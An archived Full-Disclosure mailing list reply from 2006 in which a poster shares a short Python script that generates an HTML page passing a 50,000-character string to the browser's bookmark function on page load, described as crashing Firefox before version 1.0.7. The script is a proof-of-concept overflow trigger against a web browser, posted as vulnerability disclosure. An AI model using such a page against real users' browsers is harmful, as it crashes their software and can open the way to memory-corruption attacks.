[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Buffer Overflow vulnerability in Windows Display Manager [Suspected]

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Buffer Overflow vulnerability in Windows Display Manager [Suspected]
From: casiamo <casiamo@xxxxxxxxx>
Date: Mon, 2 Jan 2006 17:09:51 +0100

Hello Sumit,

I saw this for some time ago too and I far as I know the below code would do
the same,
with the versions below 1.0.7. As I remember were all input fields
"vulnerable". I have
choosen the bookmark "name" field, which will popup after loading with a
long buffer.

html = open("firefox.html", "w")
buff = 'A' * 50000
html.write("<html><head>\n"
           "<script type=\"text/javascript\">\n"
           "function bookmarksite(title, url){\n"
           "if (document.all)\n"
           "window.external.AddFavorite(url, title);\n"
           "else if (window.sidebar)\n"
           "window.sidebar.addPanel(title, url, \"\")}\n"
           "</script></head>\n"
           "<body onload=\"javascript:bookmarksite('"+buff+"',
'http://www.mozilla.org')\"
>\n"
           "</body></html>")
html.close()

Regards,

Casiamo

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] Antitoxin for "SQL Injection" (?)
Next by Date: Re: [Full-disclosure] Spy Agency Mined Vast Data Trove and other tales
Previous by thread: Re: [Full-disclosure] Buffer Overflow vulnerability in Windows Display Manager [Suspected]
Next by thread: [Full-disclosure] What's with the /event.php?q=... hits?
Index(es):
- Date
- Thread